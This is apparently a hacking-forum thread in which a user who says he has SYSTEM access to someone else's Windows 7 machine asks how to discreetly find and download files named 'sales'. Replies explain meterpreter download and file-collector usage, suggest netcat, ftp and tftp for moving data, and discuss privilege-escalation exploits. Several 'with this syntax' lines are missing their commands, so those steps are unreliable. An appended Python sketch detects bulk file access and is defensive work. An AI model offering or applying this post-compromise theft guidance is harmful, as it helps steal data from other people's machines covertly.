So I've compromised a Windows 7 system (system priv and all) and would like to download files directly from his computer to mine. Is it possible to write a script that would search his computer for any files titled sales and download them? I couldn't find anything in the ultimate list of meterpreter scripts. Google searches have led me to find veil-pillage's Remote Desktop tool as a possible option but there has to be a more discreet way. Thanks in advance.
10 Responses
You could script netcat, but downloading multiple files would be complicated.
SSH is not a reliable way in this case.
I searched for some meterpreter scripting.
http://www.offensive-security.com/metasploit-unleashed/Custom_Scripting
Basically you could write a Ruby script to locate all the "sales" files and then download them with meterpreter.
Searching deeper I found another solution:
You can download files with meterpreter with the syntax:
meterpreter> download WINDOWSPATH LINUXPATH (in case you are using Kali)
But there's more!
You can create a list of files to download.
NOTE: I've never done this before, so I don't know if it actually works, people with more knowledge may confirm, thank you.
If you know the extension of the sales files, this will be easier.
To create the list, run the file collector script with this syntax (once you got the meterpreter shell):
Where -d means directory, use -r if you want to search in sub-folders, use -f if you want to search for specific extensions (-r -f anyfile.txt -o etc...), that fits perfectly if you know the file type and if it is different from common ones.
Where WDP is the path of the directory, so if you know where the sales files are just write down the complete path, if you don't, generally go with "C:\\".
Where LDP (for example /root/filelist.txt) is the directory you want the filelist to be written to (-o) in your linux machine (in case you are using Kali).
Now that you have a list of files, you can start downloading them:
So if you want to search for files that have "sales" in the name, I guess you could make the WDP something like this, however I'm not 100% sure this will work, waiting for confirmation:
If you want more on meterpreter scripting, there's "Metasploit Unleashed", an online free "course" to metasploit.
But before trying this, you should wait for confirmation, however there's documentation online.
EDIT: found this article that explains it easier, I hope this is not spam: http://www.vidsploit.com/meterpreter/search-for-interesting-files/
Q: Is there a way to write the "anything symbol" in these posts?
To answer your question, any special formatting characters can simply be typed twice if you want them to show up in your comments. So if you want to type an asterisk (*), just type it twice in a row ("**") and it will appear as a single asterisk once you submit your comment. The same goes for underscores and square brackets.
@Bryan: That's great, any way to get code (box) formatting in the text editor? I would love to make more technical guides on exploits, plus it would look cooler..
@CIUFFY: I like that detail.
@Alex: You can search SourceForge for pillage modules for MSF if you have to. Good Luck. Got System?
In this case I had system because I had admin rights, but what do you do if you have a Meterpreter shell with user rights on a patched system? I'm attacking a Windows 7 SP1 machine so I used kiTrap0D and schelevator but they aren't working. Are there any ways to get the hashes as user or are there modern exploits I'm missing? I found a tutorial on fuzzysecurity.com that explains priv escalation and am wondering if there are any easier ways than going through all those steps.
Another question, why would non-server Windows systems ever be unpatched? Don't all Windows systems update without asking you whenever Microsoft rolls out an update? I'd understand if people torrented Windows on a large scale but most have legitimate copies of it and as far as I know you can't opt-out of updates.
Greetings, let me answer in reverse.
exit
I got NT AUTHORITY\SYSTEM earlier but I can only do it from admin privilege, I get stuck unable to get SYSTEM when I start with user. The question you're responding to doesn't have much to do with the original one, they were just additional questions I had that I felt didn't warrant a new thread.
Could be a VM.. You did have msf check for VM. Yes?
I'm targeting a laptop right beside me. Sorry for not mentioning that. I didn't know about just how many people torrented Windows though. Thanks for the info.
Alex:
Just a comment about updating. Many commercial entities disable updating on their production systems because they don't want the system offline. In addition, updates will often "break" a system and many firms delay updates until they can test them in an offline environment. As a result, MANY systems don't get updated.
OTW
*Thank you!*
@CyberHitchHiker: Yeah I do, I'll be sure to check around for good pillage modules as I assumed any good modules came with MSF.
@CIUFFY: Thanks a lot! I'll be sure to report back the results when I get back to my computer.
Alex:
Meterpreter has an upload and download function for moving files. In addition, consider ftp and tftp as well as netcat and hping for moving files.
OTW
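Seen from the monitored host, the collection discussed in this thread (search for files by name, then download them in bulk) is one process touching many keyword-matching files in a short time. The following is an added example, not code from any poster here: a detection sketch over constructed records shaped like Windows Security event 4663, assuming object-access auditing is enabled on the directories of interest; the paths, process names and thresholds are hypothetical.

```python
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

EXPLORER = r"C:\Windows\explorer.exe"
UNKNOWN = r"C:\Users\bob\AppData\Local\Temp\svc.exe"  # hypothetical binary

# Constructed records shaped like Windows Security event 4663 (object access):
# (TimeCreated, ProcessName, ObjectName). All values are made up.
SAMPLE_EVENTS = [
    ("2015-03-01T10:00:01", EXPLORER, r"C:\Users\bob\Documents\sales_q1.xlsx"),
    ("2015-03-01T11:30:00", EXPLORER, r"C:\Users\bob\Documents\sales_q2.xlsx"),
    ("2015-03-01T12:00:00", UNKNOWN, r"C:\Users\bob\Documents\sales_q1.xlsx"),
    ("2015-03-01T12:00:01", UNKNOWN, r"C:\Users\bob\Documents\sales_q2.xlsx"),
    ("2015-03-01T12:00:01", UNKNOWN, r"C:\Users\bob\Documents\notes.txt"),
    ("2015-03-01T12:00:02", UNKNOWN, r"C:\Shares\Finance\Sales-2014.csv"),
    ("2015-03-01T12:00:02", UNKNOWN, r"C:\Shares\Finance\Sales-2014.csv"),
    ("2015-03-01T12:00:03", UNKNOWN, r"C:\Users\bob\Desktop\presales.docx"),
]


def flag_bulk_keyword_reads(events, keyword="sales", threshold=3, window_s=60):
    """Return {process: n} for processes that touched >= threshold distinct
    files whose name contains `keyword` inside one sliding time window."""
    hits = defaultdict(list)
    for ts, proc, obj in events:
        # ntpath parses Windows paths correctly on any analysis host.
        if keyword.lower() in ntpath.basename(obj).lower():
            hits[proc].append((datetime.fromisoformat(ts), obj.lower()))

    window = timedelta(seconds=window_s)
    flagged = {}
    for proc, rows in hits.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            # Shrink the window from the left until it spans <= window_s.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            distinct = len({path for _, path in rows[start:end + 1]})
            if distinct >= threshold:
                flagged[proc] = max(flagged.get(proc, 0), distinct)
    return flagged


if __name__ == "__main__":
    for proc, n in flag_bulk_keyword_reads(SAMPLE_EVENTS).items():
        print(f"{proc}: {n} distinct keyword-matching files in one window")
```

Ordinary use (a user opening two sales spreadsheets ninety minutes apart) stays below the threshold; repeated access to the same file counts once.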